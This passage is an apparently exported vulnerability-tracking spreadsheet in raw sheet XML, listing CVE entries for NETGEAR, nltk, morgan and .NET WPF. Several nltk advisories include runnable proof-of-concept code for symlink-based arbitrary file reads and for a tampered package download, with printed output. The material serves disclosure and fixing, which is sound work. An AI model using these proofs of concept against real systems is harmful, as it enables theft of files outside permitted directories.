s="5" t="inlineStr"><is><t>netgear:rax30, netgear:rax30_firmware, netgear:rax35, netgear:rax35_firmware, netgear:rax38, netgear:rax38_firmware, netgear:rax40, netgear:rax40_firmware, netgear:raxe300, netgear:raxe300_firmware</t></is></c><c r="L1562" s="5" t="inlineStr" /><c r="M1562" s="5" t="inlineStr" /><c r="N1562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1562" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1562" s="5" t="inlineStr" /><c r="R1562" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S1562" s="5" t="inlineStr"><is><t>An insufficient input validation vulnerability in the listed NETGEAR RAX series models allows a network-adjacent attacker having network access (such as WiFi credentials) to crash the router's management UI. There is no confidentiality or integrity impact. A crash of the router's management UI does not impact the availability of the router's core services like WiFi network.</t></is></c><c r="T1562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9216</t></is></c></row><row r="1563"><c r="A1563" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1563" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D1563" s="5" t="inlineStr" /><c r="E1563" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1563" s="5" t="inlineStr" /><c r="H1563" s="5" t="n"><v>0.001</v></c><c r="I1563" s="5" t="inlineStr" /><c r="J1563" s="5" t="inlineStr" /><c r="K1563" s="5" t="inlineStr" /><c r="L1563" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1563" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1563" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1563" s="5" t="inlineStr" /><c r="R1563" s="5" t="inlineStr" /><c r="S1563" s="5" t="inlineStr"><is><t>NLTK's package downloader in nltk/downloader.py does not verify file integrity after download and before extraction.

The download flow at lines 789-825:
1. File is downloaded to a temp path via HTTP
2. os.replace(tmp_filepath, filepath) moves it to the final location (line 799)
3. Extraction begins via _unzip_iter() (line 825)

Between steps 2 and 3, there is no SHA-256 verification. The checksum logic exists in _pkg_status() (lines 982-1015) but it is only used BEFORE download as a status check ("is this package already installed and up-to-date?"). It is never called after download to verify the file that was actually received.

Attack vectors:
1. MITM during HTTP download (NLTK downloads from http:// by default on some mirrors)
2. Race condition on shared filesystems (attacker replaces file between os.replace and _unzip_iter)
3. DNS poisoning redirecting to attacker-controlled server

PoC:
```python
import nltk
import unittest.mock
import zipfile
import io
import os

# Create a malicious zip that will be "downloaded"
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('punkt_tab/tokenizers/punkt_tab/english.pickle', 
                b'MALICIOUS PAYLOAD - attacker controlled content')

# Patch urllib to return our malicious zip
with unittest.mock.patch('urllib.request.urlopen') as mock_urlopen:
    mock_response = unittest.mock.MagicMock()
    mock_response.read.return_value = malicious_zip.getvalue()
    mock_response.headers = {'Content-Length': str(len(malicious_zip.getvalue()))}
    mock_urlopen.return_value = mock_response
    
    # Download proceeds, no integrity check catches the swap
    # nltk.download('punkt_tab')  # Would install attacker payload
```

This is distinct from CVE-2024-39705 (pickle deserialization via download) and CVE-2025-14009 (zip-slip path traversal). Those address what happens AFTER extraction. This finding addresses the gap BEFORE extraction where integrity is never verified.

Suggested fix: After os.replace() and before _unzip_iter(), compute SHA-256 of the final file and compare against the expected checksum from the package index. Reject and delete the file if the hash does not match.</t></is></c><c r="T1563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="1564"><c r="A1564" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1564" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D1564" s="5" t="inlineStr" /><c r="E1564" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1564" s="5" t="inlineStr" /><c r="H1564" s="5" t="n"><v>0.002</v></c><c r="I1564" s="5" t="inlineStr" /><c r="J1564" s="5" t="inlineStr" /><c r="K1564" s="5" t="inlineStr" /><c r="L1564" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M1564" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1564" s="5" t="inlineStr" /><c r="R1564" s="5" t="inlineStr" /><c r="S1564" s="5" t="inlineStr"><is><t>### Impact

Morgan writes attacker-controlled request data to the access log through its tokens. The 1.11.0 fix neutralizes C0 control characters, DEL, and backslash, but it does not escape the Unicode line separators `U+0085` (NEL), `U+2028` (LINE SEPARATOR), or `U+2029` (PARAGRAPH SEPARATOR). These code points are reachable through several tokens, including the request URL (`:url`), request headers such as `:user-agent` and `:referrer`, arbitrary `:req[header]` values, and the Basic auth username (`:remote-user`). NEL is valid `obs-text` in HTTP header values, so an attacker can place it in an ordinary request header.

When such a value is logged, the raw code points survive into the emitted access-log record, and downstream ECMAScript-aware or Unicode-aware log processing splits the single physical record into multiple logical records. This allows an attacker to forge log entries. The built-in `combined`, `common`, `default`, and `short` formats are affected, as well as any custom format. This is an incomplete fix of CVE-2026-5078.

### Patches

Users should upgrade to version 1.12.0.

### Workarounds

None. The affected values include the request URL and request headers, which are core to access logging, so there is no practical format-based mitigation. Upgrade to 1.12.0.</t></is></c><c r="T1564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="1565"><c r="A1565" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1565" s="5" t="inlineStr"><is><t>CVE-2026-45219</t></is></c><c r="D1565" s="5" t="inlineStr" /><c r="E1565" s="5" t="inlineStr" /><c r="F1565" s="5" t="inlineStr" /><c r="G1565" s="5" t="inlineStr" /><c r="H1565" s="5" t="inlineStr" /><c r="I1565" s="5" t="inlineStr" /><c r="J1565" s="5" t="inlineStr" /><c r="K1565" s="5" t="inlineStr" /><c r="L1565" s="5" t="inlineStr" /><c r="M1565" s="5" t="inlineStr" /><c r="N1565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1565" s="5" t="inlineStr" /><c r="R1565" s="5" t="inlineStr" /><c r="S1565" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45219</t></is></c></row><row r="1566"><c r="A1566" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1566" s="5" t="inlineStr"><is><t>CVE-2026-45220</t></is></c><c r="D1566" s="5" t="inlineStr" /><c r="E1566" s="5" t="inlineStr" /><c r="F1566" s="5" t="inlineStr" /><c r="G1566" s="5" t="inlineStr" /><c r="H1566" s="5" t="inlineStr" /><c r="I1566" s="5" t="inlineStr" /><c r="J1566" s="5" t="inlineStr" /><c r="K1566" s="5" t="inlineStr" /><c r="L1566" s="5" t="inlineStr" /><c r="M1566" s="5" t="inlineStr" /><c r="N1566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1566" s="5" t="inlineStr" /><c r="R1566" s="5" t="inlineStr" /><c r="S1566" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45220</t></is></c></row><row r="1567"><c r="A1567" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1567" s="5" t="inlineStr"><is><t>CVE-2026-49153</t></is></c><c r="D1567" s="5" t="inlineStr" /><c r="E1567" s="5" t="inlineStr" /><c r="F1567" s="5" t="inlineStr" /><c r="G1567" s="5" t="inlineStr" /><c r="H1567" s="5" t="inlineStr" /><c r="I1567" s="5" t="inlineStr" /><c r="J1567" s="5" t="inlineStr" /><c r="K1567" s="5" t="inlineStr" /><c r="L1567" s="5" t="inlineStr" /><c r="M1567" s="5" t="inlineStr" /><c r="N1567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1567" s="5" t="inlineStr" /><c r="R1567" s="5" t="inlineStr" /><c r="S1567" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49153</t></is></c></row><row r="1568"><c r="A1568" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1568" s="5" t="inlineStr"><is><t>CVE-2026-49154</t></is></c><c r="D1568" s="5" t="inlineStr" /><c r="E1568" s="5" t="inlineStr" /><c r="F1568" s="5" t="inlineStr" /><c r="G1568" s="5" t="inlineStr" /><c r="H1568" s="5" t="inlineStr" /><c r="I1568" s="5" t="inlineStr" /><c r="J1568" s="5" t="inlineStr" /><c r="K1568" s="5" t="inlineStr" /><c r="L1568" s="5" t="inlineStr" /><c r="M1568" s="5" t="inlineStr" /><c r="N1568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1568" s="5" t="inlineStr" /><c r="R1568" s="5" t="inlineStr" /><c r="S1568" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49154</t></is></c></row><row r="1569"><c r="A1569" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1569" s="5" t="inlineStr"><is><t>CVE-2026-49155</t></is></c><c r="D1569" s="5" t="inlineStr" /><c r="E1569" s="5" t="inlineStr" /><c r="F1569" s="5" t="inlineStr" /><c r="G1569" s="5" t="inlineStr" /><c r="H1569" s="5" t="inlineStr" /><c r="I1569" s="5" t="inlineStr" /><c r="J1569" s="5" t="inlineStr" /><c r="K1569" s="5" t="inlineStr" /><c r="L1569" s="5" t="inlineStr" /><c r="M1569" s="5" t="inlineStr" /><c r="N1569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1569" s="5" t="inlineStr" /><c r="R1569" s="5" t="inlineStr" /><c r="S1569" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49155</t></is></c></row><row r="1570"><c r="A1570" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1570" s="5" t="inlineStr"><is><t>CVE-2026-49156</t></is></c><c r="D1570" s="5" t="inlineStr" /><c r="E1570" s="5" t="inlineStr" /><c r="F1570" s="5" t="inlineStr" /><c r="G1570" s="5" t="inlineStr" /><c r="H1570" s="5" t="inlineStr" /><c r="I1570" s="5" t="inlineStr" /><c r="J1570" s="5" t="inlineStr" /><c r="K1570" s="5" t="inlineStr" /><c r="L1570" s="5" t="inlineStr" /><c r="M1570" s="5" t="inlineStr" /><c r="N1570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1570" s="5" t="inlineStr" /><c r="R1570" s="5" t="inlineStr" /><c r="S1570" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49156</t></is></c></row><row r="1571"><c r="A1571" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1571" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D1571" s="5" t="inlineStr" /><c r="E1571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1571" s="5" t="inlineStr" /><c r="H1571" s="5" t="n"><v>0.01</v></c><c r="I1571" s="5" t="inlineStr" /><c r="J1571" s="5" t="inlineStr" /><c r="K1571" s="5" t="inlineStr" /><c r="L1571" s="5" t="inlineStr"><is><t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M1571" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1571" s="5" t="inlineStr" /><c r="R1571" s="5" t="inlineStr" /><c r="S1571" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Windows Presentation Foundation (WPF). This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

A remote code execution vulnerability exists in Windows Presentation Foundation (WPF) in .NET 8, .NET 9, and .NET 10 when parsing specially crafted XAML input. An attacker who successfully exploits this vulnerability could execute arbitrary code in the context of the current user.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** High
- **Score:** 7.8
- **Vector:** `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
- **Weakness:** CWE-693 (Protection Mechanism Failure)

## Affected Platforms

- **Platforms:** Windows
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name=".NET 10.0"&gt;&lt;/a&gt;.NET 10.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10

### &lt;a name=".NET 9.0"&gt;&lt;/a&gt;.NET 9.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18

### &lt;a name=".NET 8.0"&gt;&lt;/a&gt;.NET 8.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29

## Advisory FAQ

### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?

If using a package listed in [affected packages](#affected-packages), developers exposed to the vulnerability.

### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?

1. To fix the issue please install the latest version of .NET. If developers have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt them to update Visual Studio, which will also update their .NET SDKs.
2. If their application references the vulnerable nuget package, update the package reference to the patched version. Developers can list the versions they have installed by running the `dotnet --info` command.

Once developers have installed the updated runtime or SDK, they should restart their apps for the update to take effect.

Additionally, if they've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

## Other Information

### Reporting Security Issues

If anyone has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Direct questions about this issue to GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. Users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[CVE-2026-50646]( https://www.cve.org/CVERecord?id=CVE-2026-50646)

### Acknowledgements

Kevin Gosse, 41ae55e9310ff27fa6f26af4727e5590, Ky0toFu

### Revisions

V1.0 (July 14, 2026): Advisory published.</t></is></c><c r="T1571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="1572"><c r="A1572" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1572" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D1572" s="5" t="inlineStr" /><c r="E1572" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1572" s="5" t="inlineStr" /><c r="H1572" s="5" t="n"><v>0.002</v></c><c r="I1572" s="5" t="inlineStr" /><c r="J1572" s="5" t="inlineStr" /><c r="K1572" s="5" t="inlineStr" /><c r="L1572" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1572" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1572" s="5" t="inlineStr" /><c r="R1572" s="5" t="inlineStr" /><c r="S1572" s="5" t="inlineStr"><is><t>## Summary

`IPIPANCorpusReader` (`nltk/corpus/reader/ipipan.py`) exposes public methods, `channels()`, `domains()`, `categories()`, and `fileids(channels=...)`, that accept a caller supplied `fileids` list and read a file via a completely unprotected builtin `open()` call, with no `nltk.pathsec` involvement at all. A symlink placed inside the corpus root, with a name containing no separators or `..`, passes NLTK's existing traversal checks and is opened directly, reading a file from anywhere on the filesystem the process can access.

## Root cause

All four methods route through `_get_tag()`:

```python
def _get_tag(self, f, tag):
    tags = []
    with open(f) as infile:   # builtin open(), no pathsec involvement
        header = infile.read()
    ...
```

`f` arrives via `_list_header_files()` / `_list_morph_files_by()`, both of which call:

```python
f.replace("morph.xml", "header.xml")
```

on the result of `self.abspath(...)` or `self.abspaths(...)`. `FileSystemPathPointer` subclasses `str`, so `.replace()` returns a plain Python string, silently discarding the `PathPointer` wrapper. That plain string is handed straight to builtin `open()`.

This is a more severe variant of the same CWE-59 class already fixed elsewhere in this codebase (`CorpusReader.open()`, `NKJPCorpusReader.add_root()`, and the recent `FramenetCorpusReader` fix): those route file access through `nltk.pathsec.validate_path()`, at minimum the global, non-scoped check, before opening. Here, converting the `PathPointer` to a plain string before calling `open()` skips `pathsec` completely, not just the corpus-root-scoped check, so the symlink target does not even need to land under a registered `nltk.data.path` root.

Plain literal `../` traversal in the fileid is still blocked by `FileSystemPathPointer.join()`, so this is specifically the symlink variant, not a regression of the older, simpler traversal class.

## Proof of concept

Constructed the normal, documented way, `fileids` as a regex over file paths, so the reader auto-discovers whatever `.xml` files exist in its root with no special knowledge of the planted symlink.

```python
import os
import tempfile

from nltk.corpus.reader.ipipan import IPIPANCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "ipipan")
os.makedirs(corpus_root)

with open(os.path.join(corpus_root, "real_morph.xml"), "w") as f:
    f.write("&lt;channel&gt;legit&lt;/channel&gt;")

secret_dir = os.path.join(root, "outside_ipipan_root")
os.makedirs(secret_dir)
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write("&lt;channel&gt;TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT&lt;/channel&gt;")

os.symlink(secret_path, os.path.join(corpus_root, "evil_link.xml"))

reader = IPIPANCorpusReader(corpus_root, r".*\.xml")
print("Auto-discovered fileids:", sorted(reader.fileids()))

result = reader.channels(fileids=["evil_link.xml"])
print(result)
```

Actual output when run against current `develop`:

```
Auto-discovered fileids: ['evil_link.xml', 'real_morph.xml']
['TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT']
```

That content was read from `secret_path`, a file entirely outside `corpus_root`. No exception raised anywhere. The planted symlink even surfaces naturally in the reader's own `fileids()` listing, exactly as a real file would.

Verified separately that literal `../` traversal in the fileid is still rejected (`ValueError: Traversal blocked`), confirming this is specifically the symlink gap, not a broader regression.

## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered or shared corpus directory (`SECURITY.md` names "shared environments... multi-tenant pipelines" as the project's own stated threat model) plus a completely normal API call.
- Core corpus-reader code, reached through plain `import nltk` and documented, programmatic usage (`words()`, `sents()`, `channels()`, etc.), not a demo or GUI tool.
- Same reader category, and same CWE-59 mechanism, already treated as CVE-worthy twice in this codebase for `FramenetCorpusReader` and `NKJPCorpusReader`.
- Not a bypass of a claimed fix. `ipipan.py` has never had security hardening applied, and has no dedicated test coverage at all.

## CVSS v3.1

- **AV:L, AC:L**: exploitation is local filesystem symlink placement, then immediate and deterministic once triggered.
- **PR:L**: the attacker needs some pre-existing ability to plant a symlink somewhere reachable, not zero privilege, but not elevated either.
- **UI:N**: fires during routine, automated corpus processing, no separate victim action.
- **S:U**: stays within the same process's existing privileges.
- **C:H, I:N, A:N**: arbitrary file read only, no write, no crash.

## Suggested fix

Route `_get_tag()` through `nltk.pathsec.validate_path()` with the corpus root as `required_root`, or through `CorpusReader.open()`, instead of converting the `PathPointer` to a plain string and calling builtin `open()` directly. The same fix pattern already applied to `FramenetCorpusReader` and `NKJPCorpusReader` applies directly here.</t></is></c><c r="T1572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="1573"><c r="A1573" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1573" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D1573" s="5" t="inlineStr" /><c r="E1573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1573" s="5" t="inlineStr" /><c r="H1573" s="5" t="n"><v>0.006</v></c><c r="I1573" s="5" t="inlineStr" /><c r="J1573" s="5" t="inlineStr" /><c r="K1573" s="5" t="inlineStr" /><c r="L1573" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1573" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1573" s="5" t="inlineStr" /><c r="R1573" s="5" t="inlineStr" /><c r="S1573" s="5" t="inlineStr"><is><t>This is a **new, distinct vulnerability**: a bypass of the fix already published as [GHSA-xh95-f55m-82fw](https://github.com/nltk/nltk/security/advisories/GHSA-xh95-f55m-82fw) ("Path traversal in NLTK FramenetCorpusReader.frame() allows arbitrary XML file read, bypassing the nltk.pathsec sandbox"), not a duplicate of it.

## Summary

The original advisory was fixed (PR [#3581](https://github.com/nltk/nltk/pull/3581)) by adding `_reject_unsafe_path_component()`, which blocks literal `/`, `\`, `..`, and Windows drive prefixes in caller-/corpus-supplied names. It never resolves symlinks. All three call sites that use this guard still resolve the resulting path through `self.abspath()` (`nltk/corpus/reader/api.py`, `self._root.join(fileid)`), which is a plain lexical join, not the symlink-resolving, `required_root`-scoped check that `CorpusReader.open()` (and `NKJPCorpusReader`'s own fix for its sibling advisory) correctly use elsewhere in this same codebase.

A symlink placed inside the corpus's own subdirectory, with a name containing no separators at all, passes the guard cleanly and reads a file completely outside the corpus root.

## Affected code (`nltk/corpus/reader/framenet.py`)

- `frame_by_name()` reads `&lt;frame_dir&gt;/&lt;name&gt;.xml`
- `_lu_file()` reads `&lt;lu_dir&gt;/lu&lt;id&gt;.xml`
- `doc()` reads `&lt;fulltext_dir&gt;/&lt;filename&gt;`

All three follow the same chain: `_reject_unsafe_path_component(value, ...)`, then `self.abspath(os.path.join(subdir, value))`, then `XMLCorpusView(...)`, opened via `PathPointer.open()` with no `required_root`.

## Proof of concept

Self-contained, runnable end to end.

```python
import os
import tempfile

from nltk.corpus.reader.framenet import FramenetCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "framenet_v17")
frame_dir = os.path.join(corpus_root, "frame")
secret_dir = os.path.join(root, "outside_framenet_root")
os.makedirs(frame_dir)
os.makedirs(secret_dir)

with open(os.path.join(corpus_root, "frRelation.xml"), "w") as f:
    f.write("&lt;frameRelations/&gt;")

secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write(
        '&lt;frame cBy="000" cDate="01/01/2000" name="StolenFrame" ID="999999"&gt;'
        "&lt;definition&gt;THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT&lt;/definition&gt;"
        "&lt;/frame&gt;"
    )

# Attacker plants this inside &lt;corpus_root&gt;/frame/. No path separators,
# so it passes _reject_unsafe_path_component cleanly.
link_path = os.path.join(frame_dir, "evil_link.xml")
os.symlink(secret_path, link_path)

reader = FramenetCorpusReader(corpus_root, [])
reader._frame_idx = {"__dummy__": {"name": "__dummy__"}}  # skip unrelated index build

result = reader.frame_by_name("evil_link")   # normal, routine call, no ".." anywhere
print("frame name:", result["name"])
print("definition:", result["definition"])
```

Actual output when run against unpatched `main` (commit `35813c8`):

```
frame name: StolenFrame
definition: THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT
```

That content was read from `secret_path`, a file entirely outside `corpus_root`, via a single, unmodified, public API call. No exception is raised anywhere in the chain; `_reject_unsafe_path_component` passes because `"evil_link"` contains no separators, `..`, or drive prefix.

Verified the same way for the other two affected call sites, `_lu_file()` (`lu&lt;id&gt;.xml` symlink under `lu/`) and `doc()` (arbitrary filename symlink under `fulltext/`), both succeeding identically with no exception raised.
## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered/shared corpus directory (NLTK's own `SECURITY.md` names "shared environments... multi-tenant pipelines" as its threat model) plus a completely normal API call.
- Core corpus-reader code, not a demo/GUI tool.
- Confirmed unintentional: PR #3581's own description states the goal was to route through "the `nltk.pathsec` sandbox... including the strict `ENFORCE=True` mode" and be "consistent with the validation already used elsewhere in NLTK." It doesn't achieve that, since `abspath()` never reaches the scoped, symlink-resolving check that exists and is used correctly elsewhere in the same file tree (`NKJPCorpusReader`).

## Suggested fix

